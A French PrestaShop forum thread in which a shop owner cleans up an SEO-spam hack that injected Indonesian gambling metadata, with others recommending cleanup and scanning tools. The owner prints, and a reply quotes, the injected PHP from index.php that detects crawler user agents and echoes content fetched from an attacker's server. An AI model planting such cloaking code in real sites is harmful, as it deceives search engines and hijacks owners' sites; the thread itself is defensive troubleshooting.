Piratage et injonction de virus malveillant

[IBB]

Bonsoir à tous,

Je gère un site web PrestaShop hébergé chez LWS et récemment, il a été piraté. J'ai découvert des métadonnées indésirables dans l'en-tête de la page d'accueil de mon site. Des mots comme "SAPITOTO" et des phrases en indonésien apparaissent dans les balises meta, ce qui indique que le site a été compromis par des hackers. Voici un extrait du code affecté :

<!DOCTYPE html> <html ⚡="" lang="id" amp="" i-amphtml-binding="" i-amphtml-layout="" i-amphtml-no-boilerplate="" transformed="self;v=1" itemscope="itemscope" itemtype="https://schema.org/WebPage" amp-version="2406071948000" class="i-amphtml-singledoc i-amphtml-standalone"><head> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>SAPITOTO 10 Bandar Situs Toto 4d Dan Togel Online Resmi Jaya No 1 Indonesia</title> <meta name="description" content="Temukan pengalaman bermain Toto 4D dan togel online terbaik di SAPITOTO 10 Bandar Situs Toto 4d Dan Togel Online Jaya Resmi No 1 Indonesia." /> <meta name="keywords" content="situs toto, situs toto resmi, situs toto jaya, situs toto 4d, situs toto 4d resmi, togel online, togel online 4d, situs togel, togel online resmi, situs togel jaya, sapitoto" /> <meta name="page google.com" content="https://www.google.com/search?q=sapi+toto"> <meta name="page google.co.id" content="https://www.google.co.id/search?q=sapi+toto"> <meta name="page google.com" content="https://www.google.com/search?q=sapitoto"> <meta name="page google.co.id" content="https://www.google.co.id/search?q=sapitoto"> <link itemprop="mainEntityOfPage" rel="canonical" href="https://urbanart.ma/" /> <link rel="amphtml" href="https://pub-65759e4fd0324f7680a0a3913203d631.r2.dev/urbanart.html" />

urbanart.ma est le nom de domaine. Il me semble que les pirates sont des indonisiens. J'ai essayé de retrouver les traces des pirates dans les fichiers de mon site en effectuant des recherches de mot clé comme "SAPITOTO" mais ça n'a donné aucun résultat. Donc je ne sais plus à quel moment exactement ces scripts sont injectés le code de la page indexée.

J'aimerais obtenir des conseils sur la manière de nettoyer complètement ces données indésirables de mon site et de renforcer la sécurité pour éviter de futures intrusions.

Merci d'avance pour votre aide!

[Eolia]

Utilisez cleaner^^

https://shop.devcustom.net/fr/content/16-nettoyage-hack

[Mediacom87]

Bonjour,

on en parle depuis longtemps de ces piratages à répétition sur PrestaShop : https://www.mediacom87.fr/securite-prestashop-proactive-ou-corrective/

[Eolia]

Mouais, alors perso je ne suis pas du tout fan du module PrestaScan Security qui n'est pas transparent du tout, a un accès total à la boutique et à la base de données et envoie les infos chez profileo.

[IBB]

3 hours ago, Eolia said:

Utilisez cleaner^^

https://shop.devcustom.net/fr/content/16-nettoyage-hack

Salut merci pour votre réponse ! 

J'ai essayé mais on me demande toujours d'augmenter la taille de la mémoire sur le serveur d'au minimum 512M je ne sais pas pourquoi. Vous avez une idée de comment pourrais-je s'en passer de ça ? 

Edited July 5, 2024 by IBB (see edit history)

[IBB]

1 hour ago, Mediacom87 said:

Bonjour,

on en parle depuis longtemps de ces piratages à répétition sur PrestaShop : https://www.mediacom87.fr/securite-prestashop-proactive-ou-corrective/

Abbon!? Donc c'est partout alors 🤔

Leurs virus est très puissant quand même j'avoue. 

Merci pour lien pour le lien du coup ! 

Edited July 5, 2024 by IBB (see edit history)

[Mediacom87]

Il y a 16 heures, Eolia a dit :

Mouais, alors perso je ne suis pas du tout fan du module PrestaScan Security qui n'est pas transparent du tout, a un accès total à la boutique et à la base de données et envoie les infos chez profileo.

Personnellement, je lui préfère https://github.com/prestaalba/fop_publishedvulnerabilityscan

[Eolia]

Il y a 15 heures, IBB a dit :

Salut merci pour votre réponse ! 

J'ai essayé mais on me demande toujours d'augmenter la taille de la mémoire sur le serveur d'au minimum 512M je ne sais pas pourquoi. Vous avez une idée de comment pourrais-je s'en passer de ça ? 

Dans les paramètres de votre hébergement si vous pouvez augmenter la mémoire disponible.

 

Il y a 15 heures, IBB a dit :

Abbon!? Donc c'est partout alors 🤔

Leurs virus est très puissant quand même j'avoue. 

Ce ne sont pas des virus mais des scripts et il n'y en a pas qu'un mais des milliers. Tous les sites web se font attaquer en permanence.

[Eolia]

il y a une heure, Mediacom87 a dit :

Personnellement, je lui préfère https://github.com/prestaalba/fop_publishedvulnerabilityscan

Celui-là est très bien mais ne check que les modules connus pour avoir des failles.

[IBB]

Quand j'ai lancé le script cleaner.php, il m'a fait savoir que le fichier index.php coeur de mon site contenait un script php qui n'était pas dans la version d'origine. Et effectivement, j'y suis allé jeter un coup d'oeil, je vois un script php qui  contenait ce code ci-dessous tout au début du fchier avant même les commentaires prestashop:

function is_bot() {

    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');

    foreach ($bots as $bot) {

        if (stripos($user_agent, $bot) !== false) {

            return true;

        }

    }

    return false;

}

if (is_bot()) {

    $message = file_get_contents('https://seoleveling.org/CLOAKING/urbanart.ma.txt');#NAROLINK

    echo $message;

}

Avant quand demandais une réindexation et explore la page trouvée, je voyais tas d'informations des pirates et même l'en-tête de la était carrément modifié. Mais maintenant que j'ai mis à jour le fichier index.php et demander à nouveau une réindexation, tous ces blablas n'y sont plus !

Un grand merci à vous tous !!!

[Mediacom87]

il y a une heure, Eolia a dit :

Celui-là est très bien mais ne check que les modules connus pour avoir des failles.

Tout à fait, il vient en complément de ton script, c'est une évidence.

Nettoyer un hack, n'est pas simplement remettre les fichiers d'origine, je suis abasourdie par certains professionnels qui ne font rien de plus.

L'accumulation de solution peut aider à optimiser les informations.

[Eolia]

il y a 55 minutes, IBB a dit :

Quand j'ai lancé le script cleaner.php, il m'a fait savoir que le fichier index.php coeur de mon site contenait un script php qui n'était pas dans la version d'origine. Et effectivement, j'y suis allé jeter un coup d'oeil, je vois un script php qui  contenait ce code ci-dessous tout au début du fchier avant même les commentaires prestashop:

function is_bot() {

    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');

    foreach ($bots as $bot) {

        if (stripos($user_agent, $bot) !== false) {

            return true;

        }

    }

    return false;

}

if (is_bot()) {

    $message = file_get_contents('https://seoleveling.org/CLOAKING/urbanart.ma.txt');#NAROLINK

    echo $message;

}

Avant quand demandais une réindexation et explore la page trouvée, je voyais tas d'informations des pirates et même l'en-tête de la était carrément modifié. Mais maintenant que j'ai mis à jour le fichier index.php et demander à nouveau une réindexation, tous ces blablas n'y sont plus !

Un grand merci à vous tous !!!

Ce qu'il faut savoir c'est que ce code n'est pas arrivé tout seul donc bien regarder la liste des modules inscrit comme contenant des fonctions sensibles et les supprimer (si vous ne les utilisez pas) ou les mettre à jour au plus vite.

[IBB]

1 hour ago, Eolia said:

Ce qu'il faut savoir c'est que ce code n'est pas arrivé tout seul donc bien regarder la liste des modules inscrit comme contenant des fonctions sensibles et les supprimer (si vous ne les utilisez pas) ou les mettre à jour au plus vite.

Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. 

[Mediacom87]

il y a 16 minutes, IBB a dit :

Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. 

Il faut analyser le code et savoir s'il y a un risque ou non.

[Eolia]

il y a 36 minutes, IBB a dit :

Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. 

Vous ne supprimez, depuis le BO => pages Modules, UNIQUEMENT les modules que vous n'utilisez pas ou qui sont désactivés ou non-configurés

[IBB]

23 hours ago, Eolia said:

Vous ne supprimez, depuis le BO => pages Modules, UNIQUEMENT les modules que vous n'utilisez pas ou qui sont désactivés ou non-configurés

OKay d'accord. Mais jusque là c'est leur logo qui refuse de céder. Pourtant le lien qui inclut le logo pointe vers le mien. Avez-vous une solution pour se débarrasser ? 

[Eolia]

Il y a 3 heures, IBB a dit :

OKay d'accord. Mais jusque là c'est leur logo qui refuse de céder. Pourtant le lien qui inclut le logo pointe vers le mien. Avez-vous une solution pour se débarrasser ? 

De quoi parlez-vous ? Quel logo, qui refuse de céder quoi ?

[IBB]

Quand ils ont piratés, ils ont carrément changé le logo de mon site en le remplaçant par le leur. Et même après que j'aie nettoyé leur traces le logo reste toujours. Voici en image de quoi je parle

Pourtant le lien vers mon logo est bien defini dans l'en-tête de la page comme vous pouvez le voir en image.

 

[Eolia]

Relancez le sitemap et demandez à Google de ré-indexer

[IBB]

32 minutes ago, Eolia said:

Relancez le sitemap et demandez à Google de ré-indexer

Oui j'avais déjà effectué tout ça mais malgré tout ça persiste toujours. Pourtant le changement a été effectué sur mobile. Mais sur PC pas encore 

[Eolia]

L'index Google est mobile first il a donc indexé les pages en vue mobile en premier, la vue desktop va suivre.

[IBB]

1 hour ago, Eolia said:

L'index Google est mobile first il a donc indexé les pages en vue mobile en premier, la vue desktop va suivre.

OKay donc je dois continuer à attendre jusqu'à ce que le moteur Google indexe sur Desktop aussi 

[djelcass]

Les attaques de cloaking peuvent être sophistiquées et difficiles à détecter. Voici quelques conseils pour vous protéger et réagir rapidement en cas d'intrusion :

1. Sauvegardez régulièrement votre site :  
   Il est essentiel de toujours disposer d'une copie de sécurité complète de votre site internet. Cela vous permettra de restaurer votre site en l'état en cas de compromission.

2. Changez vos mots de passe régulièrement :  
   Renouvelez les mots de passe de vos comptes administrateurs, FTP, base de données et autres services liés à votre site. Utilisez des mots de passe forts et uniques.

3. Créez un compte Google Search Console :  
   Configurez un compte Google Search Console et vérifiez la propriété de votre domaine en ajoutant un enregistrement TXT DNS. Cela vous permettra de surveiller les performances de votre site et de détecter toute activité suspecte.

4. Identifiez les fichiers modifiés par l'attaquant :  
   Si votre site est compromis, utilisez le script `clean.php` (s'il est disponible) pour identifier les fichiers altérés par l'attaquant. Cela vous aidera à nettoyer votre site efficacement.

5. Générez et soumettez un sitemap :  
   Créez un sitemap pour votre boutique PrestaShop et soumettez-le via Google Search Console. Cela permettra à Google de mieux indexer votre site et de détecter rapidement toute anomalie.

En suivant ces recommandations, vous serez en mesure de détecter une attaque en temps réel et de prendre les mesures nécessaires pour y remédier rapidement.

--- 

Ces conseils vous aideront à renforcer la sécurité de votre site et à minimiser les risques d'attaques futures.

[Eolia]

L'intérêt d'un post ChatGPT ici ?

[djelcass]

Les informations que j'ai ajoutées ne proviennent pas de ChatGPT, mais de mon expérience. J'ai travaillé sur plusieurs sites ayant été victimes de cloaking.